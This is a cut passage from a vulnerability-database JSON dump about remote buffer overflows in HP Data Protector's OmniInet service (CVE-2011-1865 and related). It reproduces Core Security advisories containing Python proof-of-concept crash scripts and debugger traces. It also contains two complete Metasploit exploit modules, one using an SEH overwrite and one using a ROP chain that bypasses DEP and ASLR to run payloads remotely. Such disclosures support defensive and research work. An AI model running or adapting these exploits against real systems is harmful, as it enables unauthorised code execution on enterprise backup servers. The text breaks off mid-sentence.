a Creative \nCommons Attribution Non-Commercial Share-Alike 3.0 (United States) \nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ \n \n \n14. *PGP/GPG Keys* \n \nThis advisory has been signed with the GPG key of Core Security \nTechnologies advisories team, which is available for download at \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.9 (MingW32) \n \niEUEARECAAYFAk4LmqsACgkQyNibggitWa02bgCYyTgE3BmdxGGAOY4dNZqmekvo \nCwCfTapBtDaQT/LBrrVC7K4l8G5hnEo= \n=ozGY \n-----END PGP SIGNATURE----- \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/102673/CORE-2011-0514.txt"}, {"lastseen": "2016-12-05T22:20:32", "description": "", "published": "2011-06-30T00:00:00", "type": "packetstorm", "title": "Core Security Technologies Advisory 2011.0606", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1866"], "modified": "2011-06-30T00:00:00", "id": "PACKETSTORM:102677", "href": "https://packetstormsecurity.com/files/102677/Core-Security-Technologies-Advisory-2011.0606.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \nCore Security Technologies - Corelabs Advisory \nhttp://corelabs.coresecurity.com/ \n \nHP Data Protector EXEC_CMD Buffer Overflow Vulnerability \n \n \n1. *Advisory Information* \n \nTitle: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability \nAdvisory ID: CORE-2011-0606 \nAdvisory URL: \nhttp://www.coresecurity.com/content/HP-Data-Protector-EXECCMD-Vulnerability \nDate published: 2011-06-29 \nDate of last update: 2011-06-29 \nVendors contacted: HP \nRelease mode: Coordinated release \n \n \n2. *Vulnerability Information* \n \nClass: Remote stack overflow [CWE-120] \nImpact: Code execution \nRemotely Exploitable: Yes \nLocally Exploitable: No \nCVE Name: CVE-2011-1866 \n \n \n3. *Vulnerability Description* \n \nHP Data Protector [1] is an automated backup and recovery software for \nsingle-server to enterprise environments. A vulnerability in HP Data \nProtector could allow a remote attacker to execute arbitrary code. The \nvulnerability is triggered by sending a request to port 5555 of a host \nrunning the \"data protector inet\" service, part of HP Data Protector. \n \n \n4. *Vulnerable packages* \n \n. HP OpenView Storage Data Protector v6.20 (running on Windows). \n. HP OpenView Storage Data Protector v6.11 (running on Windows). \n. HP OpenView Storage Data Protector v6.10 (running on Windows). \n. HP OpenView Storage Data Protector v6.00 (running on Windows). \n. Previous versions may be affected, but were not tested. \n \n \n5. *Non-vulnerable packages* \n \n. No fixes are available at the time of publication. \n \n \n6. *Vendor Information, Solutions and Workarounds* \n \nHP has issued a security bulletin with document ID c02872182 [2] \navailable through HP Support Center at http://www.hp.com/go/HPSC. \n \nThe latest version of HP Data Protector is vulnerable to this issue. HP \nhas provided the following procedure to mitigate this vulnerability: \n \n1. Upgrade to Data Protector A.06.20 or subsequent. \n2. Enable encrypted control communication services on cell server and \nall clients in cell. \n \nThe upgrade is available for download from \nhttp://hp.com/go/dataprotector then under 'Product Information' click on \n'Trials and Demos'. \n \n \n7. *Credits* \n \nThis vulnerability was discovered and researched by Nahuel C. Riva from \nCore Security Technologies. Publication was coordinated by Carlos Sarraute. \n \n \n8. *Technical Description / Proof of Concept Code* \n \nThe following python script can be used to reproduce the bug. \n \n/----- \nimport sys \nimport socket \n \nfrom struct import pack \n \nip = sys.argv[1] \nport = int(sys.argv[2]) # default tcp port 5555 \n \ntarget = (ip, port) \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect(target) \n \npath = 'A' * 5000 \n \npacket = pack('<L', 0x20003220) \npacket += pack('<L', 0x00302000) \npacket += '\\x20' \npacket += pack('>H', 0x0020) \npacket += pack('<L', 0x00432000) \npacket += pack('<L', 0x00303220) \npacket += '\\x20' \npacket += 'omnicheck.exe' \npacket += pack('>H', 0x0020) \npacket += pack('>H', 0x0020) * 4 \npacket += pack('<L', 0x30200030) \npacket += pack('>H', 0x0020) \npacket += path \npacket += pack('>H', 0x0000) \n \nplen = pack('>L', len(packet)) \n \ns.send(plen + packet) \n \n- -----/ \nBy executing this script, the omniinet.exe process crashes in the \nfollowing EIP: \n \n/----- \n7C8285D3 8B0424 MOV EAX,DWORD PTR SS:[ESP] \n7C8285D6 8BE5 MOV ESP,EBP \n7C8285D8 5D POP EBP \n7C8285D9 C3 RETN \n \n- -----/ \nThis is part of a function inside the ntdll.dll library, however, if we \nlook the SEH chain, we can see that the SEH handler was overwritten with \nthe value 0x00410041 (the unicode value for \"AA\"): \n \n/----- \nSEH chain of thread 00000578 \nAddress SE handler \n009AFF94 omniinet.00410041 \n00410041 A3004472 \n \n- -----/ \nThe following are the values of the CPU registers at the time of the \ncrash: \n \n/----- \nEAX C0000008 \nECX 009AEC98 \nEDX 7C82859C ntdll.KiRaiseUserExceptionDispatcher \nEBX 0015B480 \nESP 009AEC44 \nEBP 009AEC94 \nESI 00155A80 \nEDI 00000000 \nEIP 7C8285D3 ntdll.7C8285D3 \nC 0 ES 0023 32bit 0(FFFFFFFF) \nP 1 CS 001B 32bit 0(FFFFFFFF) \nA 0 SS 0023 32bit 0(FFFFFFFF) \nZ 0 DS 0023 32bit 0(FFFFFFFF) \nS 0 FS 003B 32bit 7FFDB000(FFF) \nT 0 GS 0000 NULL \nD 0 \nO 0 LastErr ERROR_SUCCESS (00000000) \nEFL 00000206 (NO,NB,NE,A,NS,PE,GE,G) \nST0 empty 0.0 \nST1 empty 0.0 \nST2 empty 0.0 \nST3 empty 0.0 \nST4 empty 0.0 \nST5 empty 0.0 \nST6 empty 0.7610000000000000098 \nST7 empty 1.0000000000000000000 \n3 2 1 0 E S P U O Z D I \nFST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ) \nFCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 \n \n- -----/ \nThe problem is in the 0041D170 function. This function does a blind \ncopy of the string passed in the packet as a path: \n \n/----- \n0041D170 /$ 55 PUSH EBP \n0041D171 |. 8BEC MOV EBP,ESP \n0041D173 |. 51 PUSH ECX \n0041D174 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] \n0041D177 |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX \n0041D17A |. 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] \n0041D17D |. 0FB711 MOVZX EDX,WORD PTR DS:[ECX] \n0041D180 |. 85D2 TEST EDX,EDX \n0041D182 |. 74 73 JE SHORT omniinet.0041D1F7 \n[...] \n0041D1F7 |> 8B45 0C /MOV EAX,DWORD PTR SS:[EBP+C] \n0041D1FA |. 0FB708 |MOVZX ECX,WORD PTR DS:[EAX] \n0041D1FD |. 85C9 |TEST ECX,ECX \n0041D1FF |. 74 26 |JE SHORT omniinet.0041D227 \n0041D201 |. 8B55 08 |MOV EDX,DWORD PTR SS:[EBP+8] \n0041D204 |. 8955 FC |MOV DWORD PTR SS:[EBP-4],EDX \n0041D207 |. 8B45 08 |MOV EAX,DWORD PTR SS:[EBP+8] \n0041D20A |. 8B4D 0C |MOV ECX,DWORD PTR SS:[EBP+C] \n0041D20D |. 66:8B11 |MOV DX,WORD PTR DS:[ECX] \n0041D210 |. 66:8910 |MOV WORD PTR DS:[EAX],DX // copy WORDs \nto the stack \n0041D213 |. 8B45 08 |MOV EAX,DWORD PTR SS:[EBP+8] \n0041D216 |. 83C0 02 |ADD EAX,2 \n0041D219 |. 8945 08 |MOV DWORD PTR SS:[EBP+8],EAX \n0041D21C |. 8B4D 0C |MOV ECX,DWORD PTR SS:[EBP+C] \n0041D21F |. 83C1 02 |ADD ECX,2 \n0041D222 |. 894D 0C |MOV DWORD PTR SS:[EBP+C],ECX \n0041D225 |.^EB D0 \\JMP SHORT omniinet.0041D1F7 \n0041D227 |> 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] \n0041D22A |. 66:C702 0000 MOV WORD PTR DS:[EDX],0 \n0041D22F |. 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] \n0041D232 |. 8BE5 MOV ESP,EBP \n0041D234 |. 5D POP EBP \n0041D235 \\. C3 RETN \n \n- -----/ \n \n \n \n9. *Report Timeline* \n \n. 2011-06-06: \nCore Security Technologies notifies the HP team of the vulnerabilities \nand provides the technical details. Publication date is temporarily set \nto July 5th, 2011. \n \n. 2011-06-06: \nVendor confirms that a new case was assigned within HP Software Security \nResponse Team (SSRT). \n \n. 2011-06-16: \nCore requests an update on this issue, in particular Core asks the \nvendor for a technical analysis of the bugs, a list of affected products \nand versions, and the vendor's plan for providing a fix (no reply \nreceived). \n \n. 2011-06-23: \nCore requests once more an update. \n \n. 2011-06-28: \nVendor communicates that a security bulletin will be issued on the same \nday (June 28). The vendor confirms the vulnerabilities, and recommends \nas mitigation to enable encrypted communications in the cell server and \nclient. \n \n. 2011-06-28: \nCore requests a link to the vendor's bulletin, and asks whether CVE ids \nhave been assigned. \n \n. 2011-06-28: \nVendor provides a link to the bulletin and CVE names for the \nvulnerabilities. \n \n. 2011-06-29: \nAdvisory CORE-2011-0606 is published. \n \n \n \n10. *References* \n \n[1] HP Data Protector http://hp.com/go/dataprotector \n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector, \nRemote Execution of Arbitrary Code \nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182 \n \n \n11. *About CoreLabs* \n \nCoreLabs, the research center of Core Security Technologies, is charged \nwith anticipating the future needs and requirements for information \nsecurity technologies. We conduct our research in several important \nareas of computer security including system vulnerabilities, cyber \nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of \nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers, \nproject information and shared software tools for public use at: \nhttp://corelabs.coresecurity.com. \n \n \n12. *About Core Security Technologies* \n \nCore Security Technologies enables organizations to get ahead of threats \nwith security test and measurement solutions that continuously identify \nand demonstrate real-world exposures to their most critical assets. Our \ncustomers can gain real visibility into their security standing, real \nvalidation of their security controls, and real metrics to more \neffectively secure their organizations. \n \nCore Security's software solutions build on over a decade of trusted \nresearch and leading-edge threat expertise from the company's Security \nConsulting Services, CoreLabs and Engineering groups. Core Security \nTechnologies can be reached at +1 (617) 399-6980 or on the Web at: \nhttp://www.coresecurity.com. \n \n \n13. *Disclaimer* \n \nThe contents of this advisory are copyright (c) 2011 Core Security \nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative \nCommons Attribution Non-Commercial Share-Alike 3.0 (United States) \nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ \n \n \n14. *PGP/GPG Keys* \n \nThis advisory has been signed with the GPG key of Core Security \nTechnologies advisories team, which is available for download at \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.9 (MingW32) \n \niEYEARECAAYFAk4LnZsACgkQyNibggitWa07/ACfSlzkBvbowAskeP/K4FqtxCay \nEAkAnRCPKdc35t5Cb0ZJbGy4me4JRALo \n=zHon \n-----END PGP SIGNATURE----- \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/102677/CORE-2011-0606.txt"}, {"lastseen": "2016-12-05T22:22:11", "description": "", "published": "2011-07-02T00:00:00", "type": "packetstorm", "title": "HP OmniInet.exe Opcode 27 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2011-07-02T00:00:00", "id": "PACKETSTORM:102732", "href": "https://packetstormsecurity.com/files/102732/HP-OmniInet.exe-Opcode-27-Buffer-Overflow.html", "sourceData": "`## \n# $Id: hp_omniinet_3.rb 13081 2011-07-01 22:26:12Z sinn3r $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP OmniInet.exe Opcode 27 Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in the Hewlett-Packard \nOmniInet NT Service. By sending a specially crafted opcode 27 packet, \na remote attacker may be able to execute arbitrary code. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 13081 $', \n'References' => \n[ \n[ 'CVE', '2011-1865' ], \n[ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ], \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'seh', \n}, \n'Payload' => \n{ \n'Space' => 800, \n'BadChars' => \"\\x00\", \n'StackAdjustment' => -3500 \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243', \n{ \n#POP/POP/RET from OmniBack\\bin\\MSVCR71.dll \n'Ret' => 0x7c35630d \n} \n], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jun 29 2011')) \n \nregister_options([Opt::RPORT(5555)], self.class) \nend \n \ndef check \n \nconnect \nsock.put(rand_text_alpha_upper(64)) \nresp = sock.get_once(-1,5) \ndisconnect \n \nif (resp) \nresp = resp.unpack('v*').pack('C*') \nprint_status(\"Received response: \" + resp) \n \n# extract version \nif (resp =~ /HP Data Protector/) \nversion = resp.split[3] \nelsif (resp =~ /HP OpenView Storage Data Protector/) \nversion = resp.split[5] \nelsif (resp =~ /HP StorageWorks Application Recovery Manager/) \nversion = resp.split[5] \nelse \nreturn Exploit::CheckCode::Detected \nend \n \nversion = version.split('.') \nmajor = version[1].to_i \nminor = version[2].to_i \nif ((major < 6) or (major == 6 and minor < 11)) \nreturn Exploit::CheckCode::Vulnerable \nend \n \nif ((major > 6) or (major == 6 and minor >= 11)) \nreturn Exploit::CheckCode::Safe \nend \n \nend \nreturn Exploit::CheckCode::Safe \n \nend \n \ndef exploit \n \nconnect \n \ntrigger = rand_text_alpha_upper(10000) \ntrigger[4552, payload.encoded.length] = payload.encoded \ntrigger[5352, 8] = generate_seh_record(target.ret) \ntrigger[5360, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-788\").encode_string \n \nopcode = \"27\" \n \npacket = Rex::Text.to_unicode(\"\\x00\") \npacket << \"\\x27\\xca\" #length \npacket << \"\\xff\\xfe\\x32\" \npacket << \"\\x00\\x00\\x00\" \npacket << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 3 \npacket << Rex::Text.to_unicode(\"\\x20\") \npacket << trigger \npacket << Rex::Text.to_unicode(\"\\x00\") \npacket << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") \npacket << Rex::Text.to_unicode(\"\\x20\" + opcode + \"\\x00\") \npacket << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 24 \n \nprint_status(\"Trying #{target.name}...\") \nsock.put(packet) \n \nselect(nil,nil,nil,10) \nhandler \ndisconnect \n \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/102732/hp_omniinet_3.rb.txt"}, {"lastseen": "2016-12-05T22:13:45", "description": "", "published": "2011-07-04T00:00:00", "type": "packetstorm", "title": "HP OmniInet.exe Opcode 20 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2011-07-04T00:00:00", "id": "PACKETSTORM:102746", "href": "https://packetstormsecurity.com/files/102746/HP-OmniInet.exe-Opcode-20-Buffer-Overflow.html", "sourceData": "`## \n# $Id: hp_omniinet_4.rb 13092 2011-07-04 17:02:40Z sinn3r $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"HP OmniInet.exe Opcode 20 Buffer Overflow\", \n'Description' => %q{ \nThis module exploits a vulnerability found in HP Data Protector's OmniInet \nprocess. By supplying a long string of data as the file path with opcode '20', \na buffer overflow can occur when this data is being written on the stack where \nno proper bounds checking is done beforehand, which results arbitrary code \nexecution under the context of SYSTEM. This module is also made against systems \nsuch as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR \nenabled by default. \n}, \n'License' => MSF_LICENSE, \n'Version' => \"$Revision: 13092 $\", \n'Author' => \n[ \n'Oren Isacson', #Initial discovery, poc \n'muts', #Initial poc of the ROP exploit w/ dookie \n'dookie2000ca', #Initial poc of the ROP exploit w/ muts \n'sinn3r', #MSF module with corelanc0d3r (Also Thx to MC and HD) \n'corelanc0d3r', #MSF module with sinn3r \n], \n'References' => \n[ \n[ 'CVE', '2011-1865' ], \n[ 'URL', 'http://www.exploit-db.com/exploits/17468/' ], \n[ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ], \n[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182' ], \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\", \n'PrependEncoder' => \"\\x66\\x81\\xc4\\xb8\\x0b\\x61\\x9d\", #add sp, 0xb88; popad; popfd \n}, \n'DefaultOptions' => \n{ \n'ExitFunction' => \"process\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n#If 'Max' gets too long (ie. 10000 bytes), we can get a busted heap \n[ \n'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243 on XP SP3 or Win Server 2003', \n{ \n'Offset' => 2005, #For overwriting a RETN (6481 for SEH) \n'Ret' => 0x7C342629, #RETN - MSVCR71.dll \n'Max' => 5000, \n} \n], \n[ \n'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243 on Win Server 2008', \n{ \n'Offset' => 1993, #For overwriting a RETN (6481 for SEH) \n'Ret' => 0x7C342629, #RETN - MSVCR71.dll \n'Max' => 5000, \n} \n], \n], \n'Privileged' => false, \n'DisclosureDate' => \"Jun 29 2011\", \n'DefaultTarget' => 0)) \n \nregister_options([Opt::RPORT(5555)], self.class) \nend \n \ndef nop \nreturn make_nops(4).unpack(\"L\")[0].to_i \nend \n \ndef exploit \n \nconnect \n \n#mona.py tekniq \n#https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/ \nrop = [ \n#Initial setup \n0x7C342629, # SLIDE \n0x7C342629, # SLIDE \n0x7C342629, # SLIDE \n0x7C342629, # SLIDE \n#ROP begins here \n0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) \n0x7c37a140, # Make EAX readable \n0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll) \nnop, # EBP \n0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) \n0x7c37a140, # <- VirtualProtect() found in IAT \n0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll) \n0x7c346c0b, # Slide, so next gadget would write to correct stack location \n0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll) \nnop, # EDI (filler) \nnop, # will be patched at runtime (VP), then picked up into ESI \nnop, # EBX (filler) \n0x7c376402, # POP EBP # RETN (msvcr71.dll) \n0x7c345c30, # ptr to push esp # ret (from MSVCR71.dll) \n0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) \n0xfffff82f, # size 20001 bytes \n0x7c351e05, # NEG EAX # RETN (MSVCR71.dll) \n0x7c354901, # POP EBX # RETN (MSVCR71.dll) \n0xffffffff, # pop value into ebx \n0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll) \n0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll) \n0x7c34d201, # POP ECX # RETN (MSVCR71.dll) \n0x7c38b001, # RW pointer (lpOldProtect) (-> ecx) \n0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll) \n0x7c34b8d8, # ROP NOP (-> edi) \n0x7c344f87, # POP EDX # RETN (MSVCR71.dll) \n0xffffffc0, # value to negate, target value : 0x00000040, target: edx \n0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll) \n0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) \n0x90909090, # NOPS (-> eax) \n0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll) \n].pack('V*') \n \n#Overflowing path \"C:\\Program Files\\OmniBack\\bin\\\" \n#4807 bytes after target.ret, but we need to use less than that to avoid a busted heap \nsploit = '' \nsploit << rand_text_alpha(target['Offset']-sploit.length) \nsploit << [target.ret].pack('V*') \nsploit << rop \nsploit << payload.encoded \nsploit << rand_text_alpha(target['Max']-sploit.length) \n \npkt = '' \npkt << Rex::Text.to_unicode(\"\\x00\") \npkt << \"\\x41\\x41\" #Length field place holder \npkt << \"\\xff\\xfe\" \npkt << Rex::Text.to_unicode(\"\\x32\\x00\") \npkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 5) \npkt << Rex::Text.to_unicode(\"\\x20\") \npkt << Rex::Text.to_unicode(\"20\") #Opcode \npkt << \"\\x00\" \npkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 7) \npkt << Rex::Text.to_unicode(\"\\x20\\x00\") \npkt << sploit \npkt << Rex::Text.to_unicode(\"\\x00\") \npkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 16) \n \n#pkt length \npkt[2,2] = [pkt.length-5].pack('n') \n \nprint_status(\"Sending packet to #{datastore['RHOST']}...\") \nsock.put(pkt) \n \n#Data Protector lags before triggering the vuln code \n#Long delay seems necessary to ensure we get a shell back \nselect(nil,nil,nil,20) \n \nhandler \ndisconnect \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/102746/hp_omniinet_4.rb.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:18", "description": "\nHP Data Protector 6.20 - Multiple Vulnerabilities", "edition": 1, "published": "2011-06-29T00:00:00", "title": "HP Data Protector 6.20 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1515", "CVE-2011-1514", "CVE-2011-1865"], "modified": "2011-06-29T00:00:00", "id": "EXPLOITPACK:357E2A5253FECAF999A26172A2781370", "href": "", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n Core Security Technologies - Corelabs Advisory\n http://corelabs.coresecurity.com/\n\n Multiple vulnerabilities in HP Data Protector\n\n\n1. *Advisory Information*\n\nTitle: Multiple vulnerabilities in HP Data Protector\nAdvisory ID: CORE-2011-0514\nAdvisory URL:\nhttp://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities\nDate published: 2011-06-29\nDate of last update: 2011-06-29\nVendors contacted: HP\nRelease mode: Coordinated release\n\n\n2. *Vulnerability Information*\n\nClass: Remote stack overflow [CWE-120], Null pointer dereference\n[CWE-476], Improper input validation [CWE-20]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2011-1865, CVE-2011-1514, CVE-2011-1515\n\n\n3. *Vulnerability Description*\n\nHP Data Protector [1] is an automated backup and recovery software for\nsingle-server to enterprise environments. Multiple vulnerabilities have\nbeen found in HP Data Protector that could allow a remote attacker to\nexecute arbitrary code and lead to denial of service conditions. The\nvulnerabilities are triggered by sending a request to port 5555 of a\nhost running the \"data protector inet\" service, part of HP Data\nProtector. The request has several parameters, including an opcode. By\nsending requests with specially crafted parameters, the different bugs\ncan be triggered.\n\n\n4. *Vulnerable packages*\n\n . HP OpenView Storage Data Protector v6.20 (running on Windows).\n . HP OpenView Storage Data Protector v6.11 (running on Windows).\n . HP OpenView Storage Data Protector v6.10 (running on Windows).\n . HP OpenView Storage Data Protector v6.00 (running on Windows).\n . Previous versions may be affected, but were not tested.\n\n\n5. *Non-vulnerable packages*\n\n . No fixes are available at the time of publication.\n\n\n6. *Vendor Information, Solutions and Workarounds*\n\nHP has issued a security bulletin with document ID c02872182 [2]\navailable through HP Support Center at http://www.hp.com/go/HPSC.\n\nThe latest version of HP Data Protector is vulnerable to these issues.\nHP has provided the following procedure to mitigate these vulnerabilities:\n\n 1. Upgrade to Data Protector A.06.20 or subsequent.\n 2. Enable encrypted control communication services on cell server and\nall clients in cell.\n\n The upgrade is available for download from\nhttp://hp.com/go/dataprotector then under 'Product Information' click on\n'Trials and Demos'.\n\n\n7. *Credits*\n\nThese vulnerabilities were discovered by Oren Isacson from Core Security\nTechnologies. Publication was coordinated by Carlos Sarraute.\n\n\n8. *Technical Description / Proof of Concept Code*\n\nThe following python script can be used to reproduce the different bugs.\n\n/-----\nimport struct, socket, sys\n\ntarget = sys.argv[1]\nopcode = sys.argv[2]\nstring_lenght = int(sys.argv[3])\nargs_number = int(sys.argv[4])\nlong_argument = int(sys.argv[5])\n\ndef to_wc(x):\n return ''.join([\"%s\\x00\" % c for c in x] )\n\nargs = [to_wc('a')] * args_number\nargs[5] = to_wc(opcode)\nargs[long_argument] = 'a' * string_lenght\npacket = [\"\\xff\\xfe\\x32\\x00\\x00\\x00\"]\n\nfor s in args:\n packet.append(\"\\x20\\x00\" + s + \"\\x00\\x00\")\n\npacket = ''.join(packet)\npacket = struct.pack(\">L\", len(packet)) + packet\n\nsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nsock.connect((target, 5555))\nsock.send(packet)\n\n- -----/\n\n\nIn the following sections, we give the command line details to reproduce\neach bug, and a brief description of the effect produced.\n\n\n8.1. *Vulnerability 1. Opcodes 20 y 28.*\n\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\nfollowing commands:\n \"poc.py 127.0.0.1 20 10000 30 13\" or \"poc.py 127.0.0.1 28 10000 30 6\"\n This causes a stack overflow.\n\n/-----\n007ce194 00426c52 007d0000 00810b48 007ce266 omniinet+0x26bf3\n007ce1a8 00412a35 007ce22c 004aa900 0080edb0 omniinet+0x26c52\n007cea3c 61616161 61616161 61616161 61616161 omniinet+0x12a35\n61616161 00000000 00000000 00000000 00000000 0x61616161\n\n- -----/\n\n\n\n8.2. *Vulnerability 2. Opcode 11.*\n\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\n \"poc.py 127.0.0.1 11 10000 30 17\"\n A stack overflow is produced within the function swprintf, called from\nposition 0x00411A72.\n\n\n8.3. *Vulnerability 3. Opcode 35.*\n\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\nfollowing commands:\n \"poc.py 127.0.0.1 35 10000 30 6\" or \"poc.py 127.0.0.1 35 10000 30 7\"\n A stack overflow is produced within the function swprintf, called from\nposition 0041367F.\n\n\n8.4. *Vulnerability 4. Opcode 42.*\n\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\n \"poc.py 127.0.0.1 42 10000 30 9\"\n A stack overflow is produced by calling the function swprintf from\nposition 0x0040A9BA.\n\n\n8.5. *Vulnerability 5. Opcode 46.*\n\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\n \"poc.py 127.0.0.1 46 10000 30 17\"\n A stack overflow is produced by calling the function swprintf from\nposition 0x0040A708.\n\n\n8.6. *Vulnerability 6. Opcode 27.*\n\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\n \"poc.py 127.0.0.1 27 10000 30 3\"\n A stack overflow is produced by calling the function swprintf from\nposition 0x0040AD53.\n\n\n8.7. *Vulnerabilidad 7. Opcode 17.*\n\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\n \"poc.py 127.0.0.1 17 10000 30 6\"\n A stack overflow is produced by calling the function swprintf from\nposition 0x0040FC05.\n\n\n8.8. *Vulnerability 8. Opcode 11.*\n\n[CVE-2011-1514] This vulnerability is reproduced with the following command:\n \"poc.py 127.0.0.1 11 1 7 6\"\n This causes a null pointer dereference.\n\n/-----\neax=00000014 ebx=00156490 ecx=007cdd34 edx=007eecf0 esi=00156490\nedi=00000000\neip=00407ed0 esp=007cdd34 ebp=007cdd8c iopl=0 nv up ei pl nz ac\npe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\nefl=00010212\nomniinet+0x7ed0:\n00407ed0 8b10 mov edx,[eax]\nds:0023:00000014=????????\n\n\n007cdd8c 0041143e 00000000 00000000 00156490 omniinet+0x7ed0\n007cea3c 0040892b 00000001 0046b9f0 00000000 omniinet+0x1143e\n007cf4b8 00408f02 00000000 00000000 00156490 omniinet+0x892b\n007cf518 0040a42c 00000000 7ad5f7f9 00000000 omniinet+0x8f02\n007cffa0 77df352b 00000001 00156498 0012e7f8 omniinet+0xa42c\n007cffb4 7c80b713 00156490 00000000 0012e7f8\nADVAPI32!CryptVerifySignatureW+0x29\n007cffec 00000000 77df3519 00156490 00000000\nkernel32!GetModuleFileNameA+0x1b4\n\n- -----/\n\n\n8.9. *Vulnerability 9. Opcode 20.*\n\n[CVE-2011-1515] This vulnerability is reproduced with the following command:\n \"poc.py 